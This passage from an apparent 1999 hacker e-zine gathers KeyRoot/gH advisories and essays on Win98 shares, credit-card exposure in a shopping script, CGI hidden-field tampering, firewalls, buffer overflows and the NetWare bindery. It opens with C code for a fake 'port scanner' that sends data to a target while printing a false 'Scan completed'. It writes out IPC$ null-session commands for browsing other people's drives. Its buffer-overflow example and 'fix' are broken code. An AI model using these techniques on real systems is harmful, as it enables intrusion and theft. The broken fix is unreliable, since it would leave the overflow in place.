  6245.         struct sockaddr_in blah;
  6246.         struct hostent *he;
  6247.         bzero((char *)&blah, sizeof(blah));
  6248.         blah.sin_family=AF_INET;
  6249.         blah.sin_addr.s_addr=inet_addr(target);
  6250.         blah.sin_port=htons(port);
  6251.       
  6252.       
  6253.         if ((he = gethostbyname(target)) != NULL) {
  6254.           bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
  6255.         }
  6256.       
  6257.         else {
  6258.           if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
  6259.             perror("gethostbyname()");
  6260.             return(-3);
  6261.           }
  6262.         }
  6263.       
  6264.           if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
  6265.             close(sock);
  6266.             return(-4);
  6267.           }
  6268.       
  6269.         return;
  6270.       }
  6271.       
  6272.       
  6273.       void main(int argc, char *argv[]) {
  6274.       
  6275.         printf("\n\nKeyRoot Port Scanner (KeyScan) v1.0 by Mnemonic\n\n");
  6276.         printf("Scanning ip address ", target, " on port ", p0rt);
  6277.         printf("\n\nScan started about five seconds ago hehehehe");
  6278.         printf("\n\n", target);
  6279.       
  6280.           if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
  6281.             printf("\n\nScan completed\n\n");
  6282.             printf("KeyRoot owns you");
  6283.             exit(-1);
  6284.           }
  6285.       
  6286.         openthesock(s, argv[1], p0rt);
  6287.       
  6288.         printf("\n  ", p0rt);
  6289.         printf("\n\nScan completed\n\n");
  6290.       
  6291.         send(s,str,strlen(str));
  6292.         usleep(100000);
  6293.         close(s);
  6294.         printf("KeyRoot owns you");
  6295.       }
  6296.       
  6297.       -----cut-----
  6298.       
  6299.       
  6300.       @HWA      
  6301.       
  6302. 39.0 Win98 Security Issues A KeyRoot/gH Advisory
  6303.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6304.      
  6305.      From www.pure-security.net
  6306.      
  6307.                           *****************************************
  6308.                          /                                         \
  6309.                          /                                         \
  6310.                          /            Mnemonic Presents            \
  6311.                          /          Win98 Security Issues          \
  6312.                          /          A KeyRoot/gH Advisory          \
  6313.                          /                                         \
  6314.                          /                                         \
  6315.                           *****************************************
  6316.       
  6317.       
  6318.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6319.       
  6320.       Win98 Security Issues
  6321.       
  6322.       7/16/99
  6323.       Mnemonic and gH
  6324.       www.pure-security.net
  6325.       xkyller@hotmail.com
  6326.       KeyRoot Information Security
  6327.       
  6328.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6329.       
  6330.       Contents
  6331.       
  6332.       1 - Abstract
  6333.       2 - Root
  6334.       3 - TCP/IP
  6335.       4 - Encryption
  6336.       5 - Permissions
  6337.       6 - Conclusion
  6338.       
  6339.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6340.       
  6341.       1 - Abstract
  6342.       
  6343.               As much as I like Win98 it is totally insecure.  Programs in the root directory can
  6344.       allow remote web access.  This could mean to browse your system files with possibly
  6345.       read and write permissions, upload and download files, remotely execute code, and
  6346.       whatever else you can think of.  If your system has important files on it then you could be
  6347.       in trouble.  The Access Controls in Win98 are misleading and can allow an attacker to
  6348.       access your hard drive with read/write permissions unpassworded.  Also there is no
  6349.       encryption scheme between the network components so basically anyone can sniff your
  6350.       passwords and whatever else you type, and improper permissions allow trojan horses to
  6351.       carry out instructions with no restrictions.  All of these security issues have the potential
  6352.       of giving an attacker remote administration over your Win98 system.  The possibilities
  6353.       that come with that are endless.  This advisory goes over several security problems in the
  6354.       Win98 operating system.  I think youÆll be interested reading it.  Have fun!
  6355.       
  6356.       
  6357.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6358.       
  6359.       2 - Root
  6360.       
  6361.               In Windows we have what is called the root directory.  This is C:\WINDOWS. 
  6362.       Files in the root directory can carry out system-wide processes that may be compromising
  6363.       to the security of the system.  Explorer.exe has been exploited in past versions to allow
  6364.       remote access to Win95/98 over the web.  In fact any program in the root directory has
  6365.       the potential of being exploited.  Sometimes programs are written without security in
  6366.       mind or maybe the programmers look over parts of the code and don't realize there's a
  6367.       problem.  There could be a buffer overflow or a poorly written function that allows
  6368.       remote browsing of databases.  If you store medical or other personal information like
  6369.       credit card numbers, addresses, or company documents then this is obviously a concern. 
  6370.       Nobody wants to wake up one morning and see that their fifteen-page paper that was
  6371.       suppose to be released tomorrow has been downloaded by a teen hacker.  Windows 98
  6372.       fails to incorporate security necessary to prevent these types of attacks.  The only thing I
  6373.       can recommend at this time is that you download a free commercial firewall that's been
  6374.       released by a respectable company other than Microsoft.
  6375.       
  6376.       
  6377.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6378.       
  6379.       3 - TCP/IP
  6380.       
  6381.               Many of today's Windows '98 users want to share files with other computers on
  6382.       their existing network.  One of the easiest ways to do this is using the TCP/IP protocol. 
  6383.       All the user has to do is go to settings in the start menu, control panel and when Explorer
  6384.       opens up, click on the network icon.  When the network config folder opens there will be
  6385.       a list of what network components have been installed.  Just one click on TCP/IP and
  6386.       then Add.. File and print sharing.. OK and it's done.  The thing most people don't realize
  6387.       when setting up shares is that they don't stop to think or don't realize that people other
  6388.       than the intended people can also access these shares and without a password.  They
  6389.       assume that the password will be the same as their Windows logon password.  Well they
  6390.       assumed wrong.  Windows '98 provides poor configuration for networks which leaves
  6391.       them succeptible to attack to anyone on the Internet or on the network.  For example if I
  6392.       were on a network and new the ip address of the computer running shares I would open
  6393.       an MSDOS window and:
  6394.       
  6395.       C:\>net use p: \\targetip\ipc$
  6396.       The command completed successfully.
  6397.       
  6398.       C:\>net view \\targetip
  6399.       Shared resources at \\targetip
  6400.       
  6401.       
  6402.       Share name   Type         Used as  Comment
  6403.       
  6404.       -------------------------------------------------------------------------------
  6405.       ADMIN$       Disk                  Remote Admin
  6406.       C$           Disk                  C Drive                                    
  6407.       D$           Disk                  D Drive
  6408.       IPC$         IPC                   Remote IPC
  6409.       NETLOGON     Disk                  Logon server share
  6410.       HPLaser4     Printer               HP LaserJet 4si
  6411.       The command completed successfully.
  6412.       
  6413.       Basically what I just did was create a null connection with the IPC$ share and view what
  6414.       shares were on the network.  Now I can map to any of these shares like C$ and browse
  6415.       them with read/write permissions.  What this means is that I can take a look at any file on
  6416.       the system.  The access control features of Windows 98 are poorly set up and make
  6417.       misconfiguration of NetBIOS easy.  To learn more about NetBIOS check out The NT
  6418.       Wardoc by Rhino9.
  6419.       
  6420.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6421.       
  6422.       4 - Encryption
  6423.       
  6424.               You would think that in cooperation with the network components of Windows
  6425.       98 that there would be some sort of encryption between host and client but there's not.  If
  6426.       you do in fact have a password set on your shares any attacker who is sniffing the
  6427.       network can see you typing in your username and password in cleartext.  Win98 provides
  6428.       no prevention of this.
  6429.       
  6430.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6431.       
  6432.       5 - Permissions
  6433.       
  6434.               In the Windows environment there are no permissions on files by default.  The
  6435.       potential of what someone might do with access to all of the files that are a part of the
  6436.       Windows 98 operating system is risky.  They could also download a program which may
  6437.       be a virus or a trojan horse that executes instructions without any restrictions.  This can't
  6438.       be good for anyone.  Your Windows 98 computer is at risk of being compromised
  6439.       because Microsoft didnÆt pay attention and didnÆt do a clean job.
  6440.       
  6441.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6442.       
  6443.       6 - Conclusion
  6444.       
  6445.               Although Win98 provides excellent point-and-click features it is far beyond not
  6446.       being secure.  Since the update from Win 95 to Win 98 Microsoft has failed to improve
  6447.       the system as far as security is concerned.  There is absolutely no protection at all.  If
  6448.       thatÆs what youÆre looking for in an operating system Windows is not the way to go. 
  6449.       Switch to Unix or something.  Basically thatÆs all you can do.  Microsoft continues to
  6450.       downplay the security concerns of Windows 98 as I write this.  I donÆt think anyoneÆs
  6451.       addressed all of these issues in one informative advisory before so I decided to.  I hope
  6452.       youÆve enjoyed this advisory!  Keep tabs on gH and me and KeyRoot.
  6453.       
  6454.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6455.       
  6456.       Brought to you by KeyRoot and gLobaL heLL.
  6457.       
  6458.       
  6459.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6460.       @HWA      
  6461.     
  6462.     
  6463. 40.0 WLDoTrans.asp allows CC retrieval A gH Advisory by Mnemonic
  6464.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6465.      
  6466.      From www.pure-security.net
  6467.  
  6468.                           *****************************************
  6469.                          /                                         \
  6470.                          /                                         \
  6471.                          /            Mnemonic Presents            \
  6472.                          /    WLDoTrans.asp allows CC retrieval    \
  6473.                          /              A gH Advisory              \
  6474.                          /                                         \
  6475.                          /                                         \
  6476.                           *****************************************
  6477.       
  6478.       
  6479.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6480.       
  6481.       WLDoTrans.asp allows CC retrieval
  6482.       
  6483.       7/14/99
  6484.       Mnemonic and gH
  6485.       www.pure-security.net
  6486.       xkyller@hotmail.com
  6487.       KeyRoot Information Security
  6488.       
  6489.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6490.       
  6491.       1 - Abstract
  6492.       
  6493.               Although there is client authentication and usually encryption
  6494.       between client and server, WLDoTrans.asp shows credit card information
  6495.       as clear text in hidden form fields.  This can be retrieved by anyone
  6496.       local to the machine by viewing the page's source.  If an attacker
  6497.       gets hold of the credit information they can buy things with your
  6498.       card.  I hope you like the advisory.
  6499.       
  6500.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6501.       
  6502.       2 - What is WLDoTrans.asp?
  6503.       
  6504.               WLDoTrans.asp is a secript used in a lot of online shopping.
  6505.       Basically it checks to see if the info a user enters in an ordering
  6506.       form is valid.  It allows a users to purchase something like a hat or
  6507.       a t-shirt or anything else in the online market.  When the user enters
  6508.       the information it gets encrypted before going to the server so that
  6509.       no one can intercept it and read it.  This is suppose to allow for
  6510.       secure online shopping.  However, as you will see, things aren't
  6511.       always secure as the little "you are in a secure area" boxes tell us.
  6512.       
  6513.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6514.       
  6515.       3 - Description
  6516.       
  6517.               Although ordering forms usually encrypt the information before
  6518.       sending it off to the server it's not secure.  Once the info reaches
  6519.       WLDoTrans.asp it gets decrypted in order to check and see if it's
  6520.       valid.  When WLDoTrans.asp loads and you view the source you can see
  6521.       in clear text the credit information you entered.  This includes the
  6522.       card type, the full credit card number, the expiration date, and the
  6523.       full name on the card.  The line with the credit card should look like
  6524.       
  6525.       <INPUT TYPE="HIDDEN" NAME="CARDNUM" VALUE="cardnumber">
  6526.       
  6527.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6528.       
  6529.       4 - Impact
  6530.               Although the script is not accessible to anyone remotely, any
  6531.               time you step away from the
  6532.       computer there's nothing keeping someone from walking up to it and
  6533.       doing as they please.  Even after you log out of an online shopping
  6534.       area, an attacker can press the "back" buttonin your web browser until
  6535.       they reach WLDoTrans.asp.  All they have to do is view the source of
  6536.       the page and boom there it is.  With your credit card number, type,
  6537.       and full name they can order anything they want to anywhere.  It
  6538.       doesn't even have to be to them.  They could decide to put you in debt
  6539.       and buy a plane.  An attacker could easily run your credit card out
  6540.       and give you bad credit.  You probably wouldn't even notice anything
  6541.       until you receive a bill for $800,000 or until someone says "sorry,
  6542.       this card is no good".
  6543.       
  6544.       
  6545.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6546.       
  6547.       5 - What to do about it
  6548.       
  6549.               The most obvious way to fix the problem is to encrypt the
  6550.       hidden form fields (HFFs) which contain the credit card information.
  6551.       This is very easy and affordable and allows WLDoTrans.asp to function
  6552.       normally.  Well encryption requires decryption on the server side and
  6553.       encryption on the web page side.  Basically this would allow you to
  6554.       encrypt the hidden values before they're submitted to WLDoTrans.asp.
  6555.       When WLDoTrans.asp loads it is imperative that it displays only the
  6556.       encrypted values or risk retrieval of the credit card information.
  6557.       
  6558.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6559.       
  6560.       Brought to you by KeyRoot and gLobaL heLL.
  6561.       
  6562.       
  6563.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6564.       @HWA      
  6565.     
  6566. 41.0 bad CGI scripts allow web access A gH Advisory by Mnemonic
  6567.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6568.      
  6569.      From www.pure-security.net
  6570.  
  6571.                           *****************************************
  6572.                          /                                         \
  6573.                          /                                         \
  6574.                          /            Mnemonic Presents            \
  6575.                          /    bad CGI scripts allow web access     \
  6576.                          /              A gH Advisory              \
  6577.                          /                                         \
  6578.                          /                                         \
  6579.                           *****************************************
  6580.       
  6581.       
  6582.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6583.       
  6584.       bad CGI scripts allow web access
  6585.       
  6586.       7/14/99
  6587.       Mnemonic and gH
  6588.       www.pure-security.net
  6589.       xkyller@hotmail.com
  6590.       KeyRoot Information Security
  6591.       
  6592.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6593.       
  6594.       1 - Abstract
  6595.       
  6596.               Many CGI scripts today accept hidden values that aren't correct.  When an attacker
  6597.       enters a value other than what is expected the script behaves weird and sometimes will allow the
  6598.       retrieval of passwords, credit card information, or system browsing.  Basically that's it.
  6599.       
  6600.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6601.       
  6602.       2 - Description
  6603.       
  6604.               More than half of all websites today are dependent on some sort of CGI script.  This
  6605.       could be to admin a system over the www, edit something, login, or make a payment.  Many of
  6606.       these scripts are written by an inexperienced programmer or one who is unconcerned about the
  6607.       security of the site.  Their reliance on faulty programs is a big security problem.  What happens
  6608.       most of the time is that a user inputs something to the script and the script doesn't check to see if
  6609.       the value is an acceptible value.  For example, here's a form from a system I was checking out a
  6610.       little while ago:
  6611.       
  6612.       <FORM METHOD=POST ACTION="http://www.server.com/cgi-bin/faultyscript">
  6613.       <INPUT NAME="member" TYPE=hidden VALUE="">
  6614.       <INPUT NAME="membername" TYPE=hidden VALUE="myaccount">
  6615.       <INPUT NAME="authentication" TYPE=hidden VALUE="abMBIV9v/bcdo">
  6616.       <INPUT NAME="passwd" TYPE=hidden VALUE="">
  6617.       <INPUT NAME="fulladdress" TYPE=hidden VALUE="http://www.server.com/blahblah">
  6618.       <INPUT NAME="subdirectory" TYPE=hidden VALUE="">
  6619.       <INPUT NAME="email" TYPE=hidden VALUE="">
  6620.       <INPUT NAME="diskspace" TYPE=hidden VALUE="">
  6621.       <INPUT NAME="extras" TYPE=hidden VALUE="">
  6622.       <INPUT NAME="timestamp" TYPE=hidden VALUE="907100341">
  6623.       <INPUT NAME="extlist" TYPE=hidden VALUE="">
  6624.       <INPUT NAME="blah" TYPE=hidden VALUE="The name of the faulty script">
  6625.       <INPUT NAME="filename" TYPE=hidden VALUE="index.html">
  6626.       
  6627.       ...
  6628.       
  6629.       <INPUT TYPE="submit" NAME="operation" VALUE="Save and Continue Editing">
  6630.       
  6631.       ...
  6632.       
  6633.               With this example, the form came with my account.  However, when I simply change the
  6634.       hidden form named "membername" from the value of my account name to the value of any other
  6635.       account name including the root and webmaster accounts.  When the page was loaded with the
  6636.       value "webmaster" replacing my account all I did was click save and a new page loaded with the
  6637.       webmaster account's password smack dab in the middle.  This kind of attack can work on any
  6638.       system running a CGI script.  All that has to happen is a kid willing to take two or three minutes
  6639.       out of his boring life and think.
  6640.       
  6641.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6642.       
  6643.       3 - Impact
  6644.       
  6645.               All this goes to show is that CGI scripts sometimes do weird things when they receive an
  6646.       input that they don't recognize.  This could mean retrieval of account passwords, credit card
  6647.       information, or browsing the system and opening files.  The impact of this problem is pretty deep. 
  6648.       If an attacker can get the webmaster's password they have total control over that site.  The
  6649.       attacker can open, alter, and delete files.  They can delete or add users, change the content of the
  6650.       main webpage, and basically do anything to the system.  If the attacker gets credit card
  6651.       information they can buy anything on someone else's credit card information and your system
  6652.       could be held responsible.  Also if the attacker can browse the system's files they can retrieve the
  6653.       passwd file or some other file that can lead to root access.  Basically it's not a good idea to have
  6654.       vulnerable CGI scripts at all.
  6655.       
  6656.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6657.       
  6658.       4 - What to do about it
  6659.       
  6660.               There only thing you can really do about this is to go back and look over the source to all
  6661.       of your CGI scripts and make sure there are checks in all of the right places.  There can't be any
  6662.       place where an attacker can enter false data and have the script accept it.  If you're at all worried
  6663.       that someone might try to exploit you then it's a good idea and it's easy.  Take a few minutes
  6664.       during lunch while you're drinking a Cherry Pepsi and eating a Philly Sub to make corrections. 
  6665.       Well that's it for this advisory.  I hope you've enjoyed reading it as much as I enjoyed writing it.
  6666.       
  6667.       
  6668.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6669.       
  6670.       Brought to you by KeyRoot and gLobaL heLL.
  6671.       
  6672.       
  6673.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6674.       @HWA      
  6675.       
  6676. 42.0 Can my firewall protect me? by Mnemonic
  6677.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6678.      
  6679.      From www.pure-security.net
  6680.      
  6681.       Can my firewall protect me? by Mnemonic
  6682.       7/7/99
  6683.       KeyRoot
  6684.       
  6685.               Everytime I look through a computer magazine or search the Internet, I see an advertisement
  6686.       for a firewall.  "Your solution to hackers" many of them boast.  By calling a product a firewall,
  6687.       vendors fool a lot of companies into buying something they don't know what it does, or something
  6688.       that won't help them at all.  A firewall is software that filters incoming and outgoing connections to
  6689.       a system.  It also monitors all server requests and the activity of the system's users on the Internet. 
  6690.       Although a company may feel safe running a firewall, they're still at a high risk of being attacked. 
  6691.       The firewall may very well protect against Denial of Service (DoS) attacks, and basic attempts at
  6692.       gaining root, or supervisor, access on the system, many firewalls actually increase the risk of attack
  6693.       rather than adding protection.  If a firewall is improperly setup, it may allow remote access to even
  6694.       the most stupid of hackers.  Additionally, the firewall may have its own problems without the help
  6695.       of an under-practiced administrator.
  6696.               It may contain a buffer overflow, for example, in the source code.  Or it may have some
  6697.       other problem which allows remote execution of files.  The problem is today's security standards
  6698.       are no higher than a sign that says "back off" on a fence post.  When a hacker knows that a system
  6699.       is running a firewall, they quickly check around to see what kind of firewall in order to exploit it. 
  6700.       He doesn't get worried and try the next system that looks vulnerable.  I know this from my own
  6701.       experience.
  6702.               A few days ago, I broke into a system, with permission of course, that boasted no kid could
  6703.       break into it.  It was running NT 4.0, IIS 4.0, Remote Access, some Cisco Router, and MIP 2.0. 
  6704.       The system was actually  vulnerable to several publicly-available exploits that led to admin-level
  6705.       access.  The firewall did nothing to prevent the attacks.
  6706.               If you would like to protect your system, the best way is to keep up on all of the latest
  6707.       attacks and how to protect yourself against each one individually.  This method is much more
  6708.       affective than buying something that could actually weaken your security instead of providing a
  6709.       shield.  If you'd like to get in touch with me I'm Mnemonic and I'm usually an op in #Legions on
  6710.       EFNet.  Go check out RootFest or something.
  6711.       
  6712.       @HWA           
  6713.       
  6714. 43.0 How company specific programs can be used against the company by Mnemonic
  6715.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6716.      
  6717.      From www.pure-security.net
  6718.      
  6719.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  6720.       
  6721.       How company-specific programs can be used against the company
  6722.       
  6723.       6/30/99
  6724.       Mnemonic
  6725.       xkyller@hotmail.com
  6726.       
  6727.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  6728.       
  6729.               So you're sitting at your computer, drinking a Pepsi, reading your new magazine,
  6730.       whatever, and you decided to read this paper because it sounded cool.  Well.. it is.  No no, I
  6731.       mean it is but that's not the point.  There are so many companies out there that depend on the
  6732.       Internet to do business.  Whether their business is marketing, communication, or video games, the
  6733.       company's systems are in use by people who aren't always on-site.  Many times a programmer
  6734.       will be hired to create programs that are made to carry out purposes that are specific to the needs
  6735.       of the company.  This opens up a big security risk.  If the program is configured incorrectly, or
  6736.       used in a way other than it was designed for, the program could behave iradically and give the user
  6737.       supervisor access.  The purpose of this paper is to show how an attacker would exploit one of
  6738.       these programs, not how to eliminate the risk.  However, in knowing the means of penetration, you
  6739.       should be able to design programs that will adamantly protect against tcp/ip based intrusions. 
  6740.       Read over this paper carefully, and learn a thing or two.  If you have any suggestions or comments
  6741.       feel free to contact me.
  6742.       
  6743.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  6744.       
  6745.       Contents:
  6746.       
  6747.       1)  Who's at risk?
  6748.       2)  Why it is a problem
  6749.       3)  How the programs are exploited
  6750.       4)  Why anyone would want to attack a company
  6751.       5)  Conclusion
  6752.       
  6753.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  6754.       
  6755.       1 - Who's at risk?
  6756.       
  6757.               There are a lot of companies out there and a lot of different work fields.  It's hard to
  6758.       narrow it down to only a handful that are at risk, because everyone is at risk.  Everyone that uses
  6759.       the Internet on a day-to-day basis that is.  Any company that does online banking or that deals
  6760.       with any type of exchange of information or requires off-site use of their systems is at risk.  For
  6761.       example, Booking Inc. might be set up in Saint Mary, Maryland and have an employee named
  6762.       Bob in Miami, Florida.  Suppose Bob needs to access Booking's server to update the information
  6763.       about an airline that was suppose to arrive in a few weeks.  Bob needs to replace it with
  6764.       information on another airline that will be arriving in its place, but he's nowhere near Booking Inc.'s
  6765.       location.  The solution is to provide Bob with an easy way to do his job from where he is:  the
  6766.       Internet.  Booking Inc. hires a programmer to write them a software suite that will allow Bob to
  6767.       connect to Booking's system and update certain things in a certain way.  This is the way most
  6768.       companies today think, but it's not a good way of thinking.
  6769.       
  6770.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  6771.       
  6772.       2 - Why it is a problem
  6773.       
  6774.               The problem with this solution is that someone not employed by the company can use the
  6775.       same means of access as Bob to access the company's database.  This isn't a good idea because
  6776.       from there, the attacker can flaunt around as if he were a part of your company.  He could make
  6777.       transactions in the company's name, change schedules, or any number of things that would cost the
  6778.       company anywhere from nothing to thousands of dollars.  No company can afford to leave their
  6779.       information that open.  Access to the database doesn't mean just looking around.  It means the
  6780.       ability to change things and go unnoticed.  Many times a user will alter something that may pass
  6781.       without question until that something is called on.  Then it really has an impact on the company. 
  6782.       Too many companies don't realize there is a problem until it is too late, so I'm telling you now.  If
  6783.       your company runs its own software there's a good chance that it is vulnerable to attack.
  6784.       
  6785.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  6786.       
  6787.       3 - How the programs are exploited
  6788.       
  6789.               Since each program is different, there are obviously more ways to exploit the programs
  6790.       than I can mention here.  Although, I will go over one of the most common methods of program
  6791.       exploitation.  It is called a buffer overflow.  A buffer is an area shared by software that can be
  6792.       called upon to recount things.  It temporarily saves necessary data.  This is where a program is
  6793.       designed to accept data, assign it a value, and store that value, that data, in a buffer.  A buffer can
  6794.       only hold a certain amount of data.  When a program receives an amount of data that is more than
  6795.       the buffer can handle, the program will not function properly.  This is called a buffer overflow.  The
  6796.       program will give the attacker privileges equivalent to that of its owner.  For example, the program
  6797.       may be "owned" by the supervisor.  That is, it can perform tasks with supervisor-equivalent
  6798.       privileges.  Let's suppose that the software Booking Inc. has given Bob is called Doober, and that
  6799.       the host side of Doober has these lines:
  6800.       
  6801.       char flightnm[168]
  6802.       printf("Change flight number to?\n", flightnm);
  6803.       strcpy(flightnm);
  6804.       
  6805.       The problem is that flightnm can only hold data up to 168 bytes and doesn't check to see if the
  6806.       input will fit in the buffer.  If Doober is owned by the supervisor, then an attacker could exploit
  6807.       Doober with a program that would input a string greater than 168 bytes.  This would easily give
  6808.       the attacker supervisor rights.  Here's another example:
  6809.       
  6810.       char buffer1[1024];
  6811.       char buffer2[1024]
  6812.       ...
  6813.       memset(buffer1, 1, sizeof(buffer1));
  6814.       memset(buffer2, 2, sizeof(buffer2));
  6815.       ...
  6816.       memcpy(buffer2, buffer1, sizeof(buffer2));
  6817.       
  6818.       If, however, you want to fix the problem, you can just add a line to make sure the input fits:
  6819.       
  6820.       ...
  6821.       memcpy(buffer2, buffer1, sizeof(buffer2));
  6822.       if ((buffer2 != 1024) && (buffer2 > 1024) && (buffer1 != 1024) && (buffer1 > 1024)) {
  6823.       printf("That was too big\n");
  6824.       exit(1);
  6825.       }
  6826.       
  6827.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  6828.       
  6829.       5 - Conclusion
  6830.       
  6831.               If your system is running company-specific software, I more than believe that you're
  6832.       vulnerable to attack.  I advise review the source code to all programs, and defining the type of
  6833.       access that the program has to the system.  Bob from Booking Inc. may need to update airline
  6834.       information, but not the method of payment the airline's customers are using.  So play it safe and all
  6835.       that jazz.  If you have any comments or suggestions or if shx.c for SunOS doesn't compile right
  6836.       (I've used shx.c for BSD don't e-mail me about that), I'm Mnemonic at xkyller@hotmail.com. 
  6837.       Peace out.
  6838.       
  6839.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  6840.       
  6841.       Legions of the Underground
  6842.       http://www.legions.org
  6843.       Keen Veracity
  6844.       http://www.underzine.com
  6845.       KeyRoot
  6846.       
  6847.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  6848.       
  6849.       @HWA           
  6850.      
  6851.      
  6852. 44.0 Exploiting the netware bindery by Mnemonic
  6853.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6854.      
  6855.      From www.pure-security.net
  6856.      
  6857.                           *****************************************
  6858.                          /                                         \
  6859.                          /                                         \
  6860.                          /            Mnemonic Presents            \
  6861.                          /      Exploiting the NetWare Bindery     \
  6862.                          /            A KeyRoot Advisory           \
  6863.                          /                                         \
  6864.                          /                                         \
  6865.                           *****************************************
  6866.       
  6867.       
  6868.       
  6869.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6870.       
  6871.       Exploiting The NetWare Bindery
  6872.       
  6873.       7/4/99
  6874.       Mnemonic and KeyRoot Information Security
  6875.       we'll get a webpage to go here
  6876.       xkyller@hotmail.com
  6877.       
  6878.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6879.       
  6880.               For those of you who follow my stuff in Keen Veracity, some of the material in this advisory
  6881.       is repeated material from previous releases.  This advisory should be accurate for versions of
  6882.       NetWare up to and including NetWare 3.x
  6883.       
  6884.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6885.       
  6886.       1 - Abstract
  6887.       
  6888.               For a long time, NetWare has been doing very poorly in the security field.  Even with the
  6889.       many tools released by various people to bring to light NetWare's weaknesses, Novell
  6890.       continues to ignore the existance of its problems until the details of an attack have been released
  6891.       to the public.  As a wannabe admin and a repetitive Pepsi drinker, I think it is necessary for me
  6892.       to release my research on NetWare security.  The problem now is that the NetWare bindery is
  6893.       openly accessible to any NetWare user.  This means to my password, your password, and that
  6894.       idiot in the office next to you's password.
  6895.       
  6896.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6897.       
  6898.       2 - The NetWare Bindery
  6899.       
  6900.               NetWare's bindery is basically memory sectioned off for use of NetWare proccesses.  It's
  6901.       a database where NetWare keeps information about the network resources and users that
  6902.       many function groups use to store and retrieve information.  Each file server on a network
  6903.       system has its own bindery, and thus its own group of known objects.  The NetWare bindery
  6904.       can best be compared to the Force.  It binds the galaxy together.  Yeah..
  6905.       
  6906.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6907.       
  6908.       3 - Description
  6909.       
  6910.               There are actually two things I want to discuss here.  The first is getting the password for
  6911.       someone else's account, and the other is getting the password for the account you're on.
  6912.       They're two seperate things.  Now check it out:
  6913.               NetWare represents each shared application, printer, or a logged-in user as an object in
  6914.       the bindery.  Each object has identifying characteristics, known as properties.  Properties are
  6915.       dependant on objects which have these attributes:
  6916.       
  6917.       OBJECT ID
  6918.       OBJECT NAME
  6919.       OBJECT TYPE
  6920.       OBJECT FLAG
  6921.       OBJECT SECURITY
  6922.       PROPERTIES FLAG
  6923.       
  6924.       These are the properties attributes:
  6925.       
  6926.       OBJECT ID
  6927.       PROPERTY NAME
  6928.       PROPERTY FLAGS
  6929.       PROPERTY SECURITY
  6930.       VALUES FLAG
  6931.       
  6932.       The property name is a character string of up to 16 characters, including the null terminator. 
  6933.       Propery names have the same restrictions on the use of characters as object names.
  6934.       
  6935.               The property flags are stored as a one-byte field.  They indicate whether the property is
